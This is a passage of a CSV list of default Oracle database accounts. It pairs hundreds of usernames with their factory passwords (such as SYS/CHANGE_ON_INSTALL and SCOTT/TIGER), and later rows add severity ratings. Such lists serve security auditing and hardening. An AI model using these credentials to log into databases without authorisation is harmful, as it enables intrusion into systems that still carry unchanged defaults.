corporation,Oracle,,,DTSP,DTSP,,,\noracle corporation,Oracle,,,EAA,EAA,,,\noracle corporation,Oracle,,,EAM,EAM,,,\noracle corporation,Oracle,,,EARLYWATCH,SUPPORT,,,\noracle corporation,Oracle,,,EAST,EAST,,,\noracle corporation,Oracle,,,EC,EC,,,\noracle corporation,Oracle,,,ECX,ECX,,,\noracle corporation,Oracle,,,EJB,EJB,,,\noracle corporation,Oracle,,,EJSADMIN,EJSADMIN,,,\noracle corporation,Oracle,,,EMP,EMP,,,\noracle corporation,Oracle,,,ENG,ENG,,,\noracle corporation,Oracle,,,ENI,ENI,,,\noracle corporation,Oracle,,,ESTOREUSER,ESTORE,,,\noracle corporation,Oracle,,,EVENT,EVENT,,,\noracle corporation,Oracle,,,EVM,EVM,,,\noracle corporation,Oracle,,,EXAMPLE,EXAMPLE,,,\noracle corporation,Oracle,,,EXFSYS,EXFSYS,,,\noracle corporation,Oracle,,,EXTDEMO,EXTDEMO,,,\noracle corporation,Oracle,,,EXTDEMO2,EXTDEMO2,,,\noracle corporation,Oracle,,,FA,FA,,,\noracle corporation,Oracle,,,FEM,FEM,,,\noracle corporation,Oracle,,,FII,FII,,,\noracle corporation,Oracle,,,FINANCE,FINANCE,,,\noracle corporation,Oracle,,,FINPROD,FINPROD,,,\noracle corporation,Oracle,,,FLM,FLM,,,\noracle corporation,Oracle,,,FND,FND,,,\noracle corporation,Oracle,,,FOO,BAR,,,\noracle corporation,Oracle,,,FPT,FPT,,,\noracle corporation,Oracle,,,FRM,FRM,,,\noracle corporation,Oracle,,,FROSTY,SNOWMAN,,,\noracle corporation,Oracle,,,FTE,FTE,,,\noracle corporation,Oracle,,,FV,FV,,,\noracle corporation,Oracle,,,GL,GL,,,\noracle corporation,Oracle,,,GMA,GMA,,,\noracle corporation,Oracle,,,GMD,GMD,,,\noracle corporation,Oracle,,,GME,GME,,,\noracle corporation,Oracle,,,GMF,GMF,,,\noracle corporation,Oracle,,,GMI,GMI,,,\noracle corporation,Oracle,,,GML,GML,,,\noracle corporation,Oracle,,,GMP,GMP,,,\noracle corporation,Oracle,,,GMS,GMS,,,\noracle corporation,Oracle,,,GPFD,GPFD,,,\noracle corporation,Oracle,,,GPLD,GPLD,,,\noracle corporation,Oracle,,,GR,GR,,,\noracle corporation,Oracle,,,HADES,HADES,,,\noracle corporation,Oracle,,,HCPARK,HCPARK,,,\noracle corporation,Oracle,,,HLW,HLW,,,\noracle corporation,Oracle,,,HR,HR,,,\noracle corporation,Oracle,,,HRI,HRI,,,\noracle corporation,Oracle,,,HVST,HVST,,,\noracle corporation,Oracle,,,HXC,HXC,,,\noracle corporation,Oracle,,,HXT,HXT,,,\noracle corporation,Oracle,,,IBA,IBA,,,\noracle corporation,Oracle,,,IBE,IBE,,,\noracle corporation,Oracle,,,IBP,IBP,,,\noracle corporation,Oracle,,,IBU,IBU,,,\noracle corporation,Oracle,,,IBY,IBY,,,\noracle corporation,Oracle,,,ICDBOWN,ICDBOWN,,,\noracle corporation,Oracle,,,ICX,ICX,,,\noracle corporation,Oracle,,,IDEMO_USER,IDEMO_USER,,,\noracle corporation,Oracle,,,IEB,IEB,,,\noracle corporation,Oracle,,,IEC,IEC,,,\noracle corporation,Oracle,,,IEM,IEM,,,\noracle corporation,Oracle,,,IEO,IEO,,,\noracle corporation,Oracle,,,IES,IES,,,\noracle corporation,Oracle,,,IEU,IEU,,,\noracle corporation,Oracle,,,IEX,IEX,,,\noracle corporation,Oracle,,,IFSSYS,IFSSYS,,,\noracle corporation,Oracle,,,IGC,IGC,,,\noracle corporation,Oracle,,,IGF,IGF,,,\noracle corporation,Oracle,,,IGI,IGI,,,\noracle corporation,Oracle,,,IGS,IGS,,,\noracle corporation,Oracle,,,IGW,IGW,,,\noracle corporation,Oracle,,,IMAGEUSER,IMAGEUSER,,,\noracle corporation,Oracle,,,IMC,IMC,,,\noracle corporation,Oracle,,,IMEDIA,IMEDIA,,,\noracle corporation,Oracle,,,IMT,IMT,,,\noracle corporation,Oracle,,,INTERNAL,SYS_STNT,,,\noracle corporation,Oracle,,,INV,INV,,,\noracle corporation,Oracle,,,IPA,IPA,,,\noracle corporation,Oracle,,,IPD,IPD,,,\noracle corporation,Oracle,,,IPLANET,IPLANET,,,\noracle corporation,Oracle,,,ISC,ISC,,,\noracle corporation,Oracle,,,ITG,ITG,,,\noracle corporation,Oracle,,,JA,JA,,,\noracle corporation,Oracle,,,JAKE,PASSWO4,,,\noracle corporation,Oracle,,,JE,JE,,,\noracle corporation,Oracle,,,JG,JG,,,\noracle corporation,Oracle,,,JILL,PASSWO2,,,\noracle corporation,Oracle,,,JL ,JL ,,,\noracle corporation,Oracle,,,JMUSER,JMUSER,,,\noracle corporation,Oracle,,,JOHN,JOHN,,,\noracle corporation,Oracle,,,JONES,STEEL,,,\noracle corporation,Oracle,,,JTF,JTF,,,\noracle corporation,Oracle,,,JTM,JTM,,,\noracle corporation,Oracle,,,JTS,JTS,,,\noracle corporation,Oracle,,,JWARD,AIROPLANE,,,\noracle corporation,Oracle,,,KWALKER,KWALKER,,,\noracle corporation,Oracle,,,L2LDEMO,L2LDEMO,,,\noracle corporation,Oracle,,,LBACSYS,LBACSYS,,,\noracle corporation,Oracle,,,LIBRARIAN,SHELVES,,,\noracle corporation,Oracle,,,MANPROD,MANPROD,,,\noracle corporation,Oracle,,,MARK,PASSWO3,,,\noracle corporation,Oracle,,,MASCARM,MANAGER,,,\noracle corporation,Oracle,,,MASTER,PASSWORD,,,\noracle corporation,Oracle,,,MDDATA,MDDATA,,,\noracle corporation,Oracle,,,MDDEMO,MDDEMO,,,\noracle corporation,Oracle,,,MDDEMO_CLERK,MGR,,,\noracle corporation,Oracle,,,MDDEMO_MGR,MGR,,,\noracle corporation,Oracle,,,MDSYS,MDSYS,,,\noracle corporation,Oracle,,,ME,ME,,,\noracle corporation,Oracle,,,MFG,MFG,,,\noracle corporation,Oracle,,,MGR,MGR,,,\noracle corporation,Oracle,,,MGWUSER,MGWUSER,,,\noracle corporation,Oracle,,,MIGRATE,MIGRATE,,,\noracle corporation,Oracle,,,MILLER,MILLER,,,\noracle corporation,Oracle,,,MMO2,UNKNOWN,,,\noracle corporation,Oracle,,,MODTEST,YES,,,\noracle corporation,Oracle,,,MOREAU,MOREAU,,,\noracle corporation,Oracle,,,MRP,MRP,,,\noracle corporation,Oracle,,,MSC,MSC,,,\noracle corporation,Oracle,,,MSD,MSD,,,\noracle corporation,Oracle,,,MSO,MSO,,,\noracle corporation,Oracle,,,MSR,MSR,,,\noracle corporation,Oracle,,,MTSSYS,MTSSYS,,,\noracle corporation,Oracle,,,MTS_USER,MTS_PASSWORD,,,\noracle corporation,Oracle,,,MWA,MWA,,,\noracle corporation,Oracle,,,MXAGENT,MXAGENT,,,\noracle corporation,Oracle,,,NAMES,NAMES,,,\noracle corporation,Oracle,,,NEOTIX_SYS,NEOTIX_SYS,,,\noracle corporation,Oracle,,,NNEUL,NNEULPASS,,,\noracle corporation,Oracle,,,NOMEUTENTE,PASSWORD,,,\noracle corporation,Oracle,,,NOME_UTILIZADOR,SENHA,,,\noracle corporation,Oracle,,,NOM_UTILISATEUR,MOT_DE_PASSE,,,\noracle corporation,Oracle,,,NUME_UTILIZATOR,PAROL,,,\noracle corporation,Oracle,,,OAIHUB902,,,,\noracle corporation,Oracle,,,OAS_PUBLIC,,,,\noracle corporation,Oracle,,,OCITEST,OCITEST,,,\noracle corporation,Oracle,,,OCM_DB_ADMIN,OCM_DB_ADMIN,,,\noracle corporation,Oracle,,,ODM,ODM,,,\noracle corporation,Oracle,,,ODM_MTR,MTRPW,,,\noracle corporation,Oracle,,,ODS,ODS,,,\noracle corporation,Oracle,,,ODSCOMMON,ODSCOMMON,,,\noracle corporation,Oracle,,,ODS_SERVER,ODS_SERVER,,,\noracle corporation,Oracle,,,OE,OE,,,\noracle corporation,Oracle,,,OEMADM,OEMADM,,,\noracle corporation,Oracle,,,OEMREP,OEMREP,,,\noracle corporation,Oracle,,,OEM_REPOSITORY,,,,\noracle corporation,Oracle,,,OKB,OKB,,,\noracle corporation,Oracle,,,OKC,OKC,,,\noracle corporation,Oracle,,,OKE,OKE,,,\noracle corporation,Oracle,,,OKI,OKI,,,\noracle corporation,Oracle,,,OKO,OKO,,,\noracle corporation,Oracle,,,OKR,OKR,,,\noracle corporation,Oracle,,,OKS,OKS,,,\noracle corporation,Oracle,,,OKX,OKX,,,\noracle corporation,Oracle,,,OLAPDBA,OLAPDBA,,,\noracle corporation,Oracle,,,OLAPSVR,INSTANCE,,,\noracle corporation,Oracle,,,OLAPSYS,MANAGER,,,\noracle corporation,Oracle,,,OMWB_EMULATION,ORACLE,,,\noracle corporation,Oracle,,,ONT,ONT,,,\noracle corporation,Oracle,,,OO,OO,,,\noracle corporation,Oracle,,,OPENSPIRIT,OPENSPIRIT,,,\noracle corporation,Oracle,,,OPI,OPI,,,\noracle corporation,Oracle,,,ORACACHE,,,,\noracle corporation,Oracle,,,ORACLE,ORACLE,,,\noracle corporation,Oracle,,,ORADBA,ORADBAPASS,,,\noracle corporation,Oracle,,,ORANGE,,,,\noracle corporation,Oracle,,,ORAPROBE,ORAPROBE,,,\noracle corporation,Oracle,,,ORAREGSYS,ORAREGSYS,,,\noracle corporation,Oracle,,,ORASSO,ORASSO,,,\noracle corporation,Oracle,,,ORASSO_DS,ORASSO_DS,,,\noracle corporation,Oracle,,,ORASSO_PA,ORASSO_PA,,,\noracle corporation,Oracle,,,ORASSO_PS,ORASSO_PS,,,\noracle corporation,Oracle,,,ORASSO_PUBLIC,ORASSO_PUBLIC,,,\noracle corporation,Oracle,,,ORASTAT,ORASTAT,,,\noracle corporation,Oracle,,,ORCLADMIN,WELCOME,,,\noracle corporation,Oracle,,,ORDCOMMON,ORDCOMMON,,,\noracle corporation,Oracle,,,ORDPLUGINS,ORDPLUGINS,,,\noracle corporation,Oracle,,,ORDSYS,ORDSYS,,,\noracle corporation,Oracle,,,OSE$HTTP$ADMIN,INVALID,,,\noracle corporation,Oracle,,,OSM,OSM,,,\noracle corporation,Oracle,,,OSP22,OSP22,,,\noracle corporation,Oracle,,,OSSAQ_HOST,,,,\noracle corporation,Oracle,,,OSSAQ_PUB,,,,\noracle corporation,Oracle,,,OSSAQ_SUB,,,,\noracle corporation,Oracle,,,OTA,OTA,,,\noracle corporation,Oracle,,,OUTLN,OUTLN,,,\noracle corporation,Oracle,,,OWA,OWA,,,\noracle corporation,Oracle,,,OWA_PUBLIC,OWA_PUBLIC,,,\noracle corporation,Oracle,,,OWF_MGR,OWF_MGR,,,\noracle corporation,Oracle,,,OWNER,OWNER,,,\noracle corporation,Oracle,,,OZF,OZF,,,\noracle corporation,Oracle,,,OZP,OZP,,,\noracle corporation,Oracle,,,OZS,OZS,,,\noracle corporation,Oracle,,,PA,PA,,,\noracle corporation,Oracle,,,PANAMA,PANAMA,,,\noracle corporation,Oracle,,,PATROL,PATROL,,,\noracle corporation,Oracle,,,PAUL,PAUL,,,\noracle corporation,Oracle,,,PERFSTAT,PERFSTAT,,,\noracle corporation,Oracle,,,PERSTAT,PERSTAT,,,\noracle corporation,Oracle,,,PJM,PJM,,,\noracle corporation,Oracle,,,PLANNING,PLANNING,,,\noracle corporation,Oracle,,,PLEX,PLEX,,,\noracle corporation,Oracle,,,PLSQL,SUPERSECRET,,,\noracle corporation,Oracle,,,PM,PM,,,\noracle corporation,Oracle,,,PMI,PMI,,,\noracle corporation,Oracle,,,PN,PN,,,\noracle corporation,Oracle,,,PO,PO,,,\noracle corporation,Oracle,,,PO7,PO7,,,\noracle corporation,Oracle,,,PO8,PO8,,,\noracle corporation,Oracle,,,POA,POA,,,\noracle corporation,Oracle,,,POM,POM,,,\noracle corporation,Oracle,,,PORTAL,,,,\noracle corporation,Oracle,,,PORTAL30,PORTAL31,,,\noracle corporation,Oracle,,,PORTAL30_ADMIN,PORTAL30_ADMIN,,,\noracle corporation,Oracle,,,PORTAL30_DEMO,PORTAL30_DEMO,,,\noracle corporation,Oracle,,,PORTAL30_PS,PORTAL30_PS,,,\noracle corporation,Oracle,,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,,,\noracle corporation,Oracle,,,PORTAL30_SSO,PORTAL30_SSO,,,\noracle corporation,Oracle,,,PORTAL30_SSO_ADMIN,PORTAL30_SSO_ADMIN,,,\noracle corporation,Oracle,,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,,,\noracle corporation,Oracle,,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,,,\noracle corporation,Oracle,,,PORTAL_APP,,,,\noracle corporation,Oracle,,,PORTAL_DEMO,,,,\noracle corporation,Oracle,,,PORTAL_PUBLIC,,,,\noracle corporation,Oracle,,,PORTAL_SSO_PS,PORTAL_SSO_PS,,,\noracle corporation,Oracle,,,POS,POS,,,\noracle corporation,Oracle,,,POWERCARTUSER,POWERCARTUSER,,,\noracle corporation,Oracle,,,PRIMARY,PRIMARY,,,\noracle corporation,Oracle,,,PSA,PSA,,,\noracle corporation,Oracle,,,PSB,PSB,,,\noracle corporation,Oracle,,,PSP,PSP,,,\noracle corporation,Oracle,,,PUBSUB,PUBSUB,,,\noracle corporation,Oracle,,,PUBSUB1,PUBSUB1,,,\noracle corporation,Oracle,,,PV,PV,,,\noracle corporation,Oracle,,,QA,QA,,,\noracle corporation,Oracle,,,QDBA,QDBA,,,\noracle corporation,Oracle,,,QP,QP,,,\noracle corporation,Oracle,,,QS,CHANGE_ON_INSTALL,,,\noracle corporation,Oracle,,,QS_ADM,UNKNOWN,,,\noracle corporation,Oracle,,,QS_CB,QS_CB,,,\noracle corporation,Oracle,,,QS_CBADM,UNKNOWN,,,\noracle corporation,Oracle,,,QS_CS,UNKNOWN,,,\noracle corporation,Oracle,,,QS_ES,CHANGE_ON_INSTALL,,,\noracle corporation,Oracle,,,QS_OS,CHANGE_ON_INSTALL,,,\noracle corporation,Oracle,,,QS_WS,UNKNOWN,,,\noracle corporation,Oracle,,,RE,RE,,,\noracle corporation,Oracle,,,REPADMIN,REPADMIN,,,\noracle corporation,Oracle,,,REPORTS,REPORTS,,,\noracle corporation,Oracle,,,REPORTS_USER,OEM_TEMP,,,\noracle corporation,Oracle,,,REP_MANAGER,DEMO,,,\noracle corporation,Oracle,,,REP_OWNER,REP_OWNER,,,\noracle corporation,Oracle,,,REP_USER,DEMO,,,\noracle corporation,Oracle,,,RG,RG,,,\noracle corporation,Oracle,,,RHX,RHX,,,\noracle corporation,Oracle,,,RLA,RLA,,,\noracle corporation,Oracle,,,RLM,RLM,,,\noracle corporation,Oracle,,,RMAIL,RMAIL,,,\noracle corporation,Oracle,,,RMAN,RMAN,,,\noracle corporation,Oracle,,,RRS,RRS,,,\noracle corporation,Oracle,,,SAMPLE,SAMPLE,,,\noracle corporation,Oracle,,,SAP,SAPR3,,,\noracle corporation,Oracle,,,SAPR3,SAP,,,\noracle corporation,Oracle,,,SCOTT,TIGGER,,,\noracle corporation,Oracle,,,SDOS_ICSAP,SDOS_ICSAP,,,\noracle corporation,Oracle,,,SECDEMO,SECDEMO,,,\noracle corporation,Oracle,,,SERVICECONSUMER1,SERVICECONSUMER1,,,\noracle corporation,Oracle,,,SH,SH,,,\noracle corporation,Oracle,,,SITEMINDER,SITEMINDER,,,\noracle corporation,Oracle,,,SI_INFORMTN_SCHEMA,SI_INFORMTN_SCHEMA,,,\noracle corporation,Oracle,,,SLIDE,SLIDEPW,,,\noracle corporation,Oracle,,,SPIERSON,SPIERSON,,,\noracle corporation,Oracle,,,SSP,SSP,,,\noracle corporation,Oracle,,,STARTER,STARTER,,,\noracle corporation,Oracle,,,STRAT_USER,STRAT_PASSWD,,,\noracle corporation,Oracle,,,SWPRO,SWPRO,,,\noracle corporation,Oracle,,,SWUSER,SWUSER,,,\noracle corporation,Oracle,,,SYMPA,SYMPA,,,\noracle corporation,Oracle,,,SYS,MANAGER,,,\noracle corporation,Oracle,,,SYSADM,SYSADM,,,\noracle corporation,Oracle,,,SYSADMIN,SYSADMIN,,,\noracle corporation,Oracle,,,SYSMAN,OEM_TEMP,,,\noracle corporation,Oracle,,,SYSTEM,ORACLE,,,\noracle corporation,Oracle,,,TAHITI,TAHITI,,,\noracle corporation,Oracle,,,TALBOT,MT6CH5,,,\noracle corporation,Oracle,,,TDOS_ICSAP,TDOS_ICSAP,,,\noracle corporation,Oracle,,,TEC,TECTEC,,,\noracle corporation,Oracle,,,TEST,TEST,,,\noracle corporation,Oracle,,,TESTPILOT,TESTPILOT,,,\noracle corporation,Oracle,,,TEST_USER,TEST_USER,,,\noracle corporation,Oracle,,,THINSAMPLE,THINSAMPLEPW,,,\noracle corporation,Oracle,,,TIBCO,TIBCO,,,\noracle corporation,Oracle,,,TIP37,TIP37,,,\noracle corporation,Oracle,,,TRACESVR,TRACE,,,\noracle corporation,Oracle,,,TRAVEL,TRAVEL,,,\noracle corporation,Oracle,,,TSDEV,TSDEV,,,\noracle corporation,Oracle,,,TSUSER,TSUSER,,,\noracle corporation,Oracle,,,TURBINE,TURBINE,,,\noracle corporation,Oracle,,,UDDISYS,,,,\noracle corporation,Oracle,,,ULTIMATE,ULTIMATE,,,\noracle corporation,Oracle,,,UM_ADMIN,UM_ADMIN,,,\noracle corporation,Oracle,,,UM_CLIENT,UM_CLIENT,,,\noracle corporation,Oracle,,,USER,USER,,,\noracle corporation,Oracle,,,USER0,USER0,,,\noracle corporation,Oracle,,,USER1,USER1,,,\noracle corporation,Oracle,,,USER2,USER2,,,\noracle corporation,Oracle,,,USER3,USER3,,,\noracle corporation,Oracle,,,USER4,USER4,,,\noracle corporation,Oracle,,,USER5,USER5,,,\noracle corporation,Oracle,,,USER6,USER6,,,\noracle corporation,Oracle,,,USER7,USER7,,,\noracle corporation,Oracle,,,USER8,USER8,,,\noracle corporation,Oracle,,,USER9,USER9,,,\noracle corporation,Oracle,,,USER_NAME,PASSWORD,,,\noracle corporation,Oracle,,,USUARIO,CLAVE,,,\noracle corporation,Oracle,,,UTILITY,UTILITY,,,\noracle corporation,Oracle,,,UTLBSTATU,UTLESTAT,,,\noracle corporation,Oracle,,,VEA,VEA,,,\noracle corporation,Oracle,,,VEH,VEH,,,\noracle corporation,Oracle,,,VERTEX_LOGIN,VERTEX_LOGIN,,,\noracle corporation,Oracle,,,VIDEOUSER,VIDEOUSER,,,\noracle corporation,Oracle,,,VIF_DEVELOPER,VIF_DEV_PWD,,,\noracle corporation,Oracle,,,VIRUSER,VIRUSER,,,\noracle corporation,Oracle,,,VPD_ADMIN,AKF7D98S2,,,\noracle corporation,Oracle,,,VRR1,UNKNOWN,,,\noracle corporation,Oracle,,,WEBCAL01,WEBCAL01,,,\noracle corporation,Oracle,,,WEBDB,WEBDB,,,\noracle corporation,Oracle,,,WEBREAD,WEBREAD,,,\noracle corporation,Oracle,,,WEBSYS,MANAGER,,,\noracle corporation,Oracle,,,WEBUSER,YOUR_PASS,,,\noracle corporation,Oracle,,,WEST,WEST,,,\noracle corporation,Oracle,,,WFADMIN,WFADMIN,,,\noracle corporation,Oracle,,,WH,WH,,,\noracle corporation,Oracle,,,WIP,WIP,,,\noracle corporation,Oracle,,,WIRELESS,,,,\noracle corporation,Oracle,,,WKADMIN,WKADMIN,,,\noracle corporation,Oracle,,,WKPROXY,UNKNOWN,,,\noracle corporation,Oracle,,,WKSYS,WKSYS,,,\noracle corporation,Oracle,,,WKUSER,WKUSER,,,\noracle corporation,Oracle,,,WK_PROXY,,,,\noracle corporation,Oracle,,,WK_SYS,,,,\noracle corporation,Oracle,,,WK_TEST,WK_TEST,,,\noracle corporation,Oracle,,,WMS,WMS,,,\noracle corporation,Oracle,,,WMSYS,WMSYS,,,\noracle corporation,Oracle,,,WOB,WOB,,,\noracle corporation,Oracle,,,WPS,WPS,,,\noracle corporation,Oracle,,,WSH,WSH,,,\noracle corporation,Oracle,,,WSM,WSM,,,\noracle corporation,Oracle,,,WWW,WWW,,,\noracle corporation,Oracle,,,WWWUSER,WWWUSER,,,\noracle corporation,Oracle,,,XADEMO,XADEMO,,,\noracle corporation,Oracle,,,XDB,CHANGE_ON_INSTALL,,,\noracle corporation,Oracle,,,XDP,XDP,,,\noracle corporation,Oracle,,,XLA,XLA,,,\noracle corporation,Oracle,,,XNC,XNC,,,\noracle corporation,Oracle,,,XNI,XNI,,,\noracle corporation,Oracle,,,XNM,XNM,,,\noracle corporation,Oracle,,,XNP,XNP,,,\noracle corporation,Oracle,,,XNS,XNS,,,\noracle corporation,Oracle,,,XPRT,XPRT,,,\noracle corporation,Oracle,,,XTR,XTR,,,\noracle,7 or later,,,Scott,Tiger,,Any,\noracle,7 or later,,,sys,change_on_install,,,\noracle,7 or later,,,system,manager,,,\noracle,8.1.7,,,,,,,\noracle,8.1.7,,Admin,,,,,\noracle,8.1.7,,Multi,,,Admin,,\noracle,8i,,,internal,oracle,,all,\noracle,8i,,,sys,change_on_install,,8.1.6,\noracle,Database,Any,,#INTERNAL,ORACLE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,#INTERNAL,SYS_STNT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ABM,ABM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ADAMS,WOOD,Threatcon 4 (least serious),,\noracle,Database,Any,,ADLDEMO,ADLDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ADMIN,JETSPEED,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ADMIN,WELCOME,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ADMINISTRATOR,ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ADMINISTRATOR,ADMINISTRATOR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AHL,AHL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AHM,AHM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AK,AK,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ALHRO,XXX,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ALHRW,XXX,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ALR,ALR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AMS,AMS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,AMV,AMV,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ANDY,SWORDFISH,Threatcon 4 (least serious),,\noracle,Database,Any,,ANONYMOUS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ANONYMOUS,ANONYMOUS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ANONYMOUS,lt;INVALIDgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AP,AP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLMGR,APPLMGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYS,APPLSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYS,APPS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYS,FND,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYSPUB,APPLSYSPUB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYSPUB,FNDPUB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLSYSPUB,PUB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLYSYSPUB,FNDPUB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPLYSYSPUB,PUB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,APPS,APPS,Threatcon 1 (most serious),,\noracle,Database,Any,,APPS_MRC,APPS,Threatcon 1 (most serious),,\noracle,Database,Any,,APPUSER,APPPASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AQ,AQ,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AQDEMO,AQDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AQJAVA,AQJAVA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AQUSER,AQUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AR,AR,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ASF,ASF,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ASG,ASG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ASL,ASL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ASO,ASO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ASP,ASP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AST,AST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ATM,SAMPLEATM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AUDIOUSER,AUDIOUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$JIS$UTILITY$,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$JIS$UTILITY$,INVALID,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$JIS$UTILITY$,lt;INVALIDgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$ORB$UNAUTHENTICATED,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$ORB$UNAUTHENTICATED,INVALID,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$ORB$UNAUTHENTICATED,lt;INVALIDgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AX,AX,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AZ,AZ,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BC4J,BC4J,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BEN,BEN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BIC,BIC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BIL,BIL,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BIM,BIM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BIS,BIS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BIV,BIV,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BIX,BIX,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BLAKE,PAPER,Threatcon 4 (least serious),,\noracle,Database,Any,,BLEWIS,BLEWIS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BOM,BOM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BRIO_ADMIN,BRIO_ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BRUGERNAVN,ADGANGSKODE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BRUKERNAVN,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BSC,BSC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BUG_REPORTS,BUG_REPORTS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CALVIN,HOBBES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CATALOG,CATALOG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CCT,CCT,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CDEMO82,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMO82,CDEMO82,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMO82,CDEMO83,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMO82,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMOCOR,CDEMOCOR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMORID,CDEMORID,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMOUCB,CDEMOUCB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDOUGLAS,CDOUGLAS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CE,CE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CENTRA,CENTRA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CENTRAL,CENTRAL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CIDS,CIDS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CIS,CIS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CIS,ZWERG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CISINFO,CISINFO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CISINFO,ZWERG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CLARK,CLOTH,Threatcon 4 (least serious),,\noracle,Database,Any,,CLKANA,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CLKANA,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CLKRT,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CLKRT,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CN,CN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,COMPANY,COMPANY,Threatcon 1 (most serious),,\noracle,Database,Any,,COMPIERE,COMPIERE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CQSCHEMAUSER,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CQUSERDBUSER,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CRP,CRP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CS,CS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSC,CSC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSD,CSD,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSE,CSE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CSF,CSF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSI,CSI,Threatcon 3 (1 is most 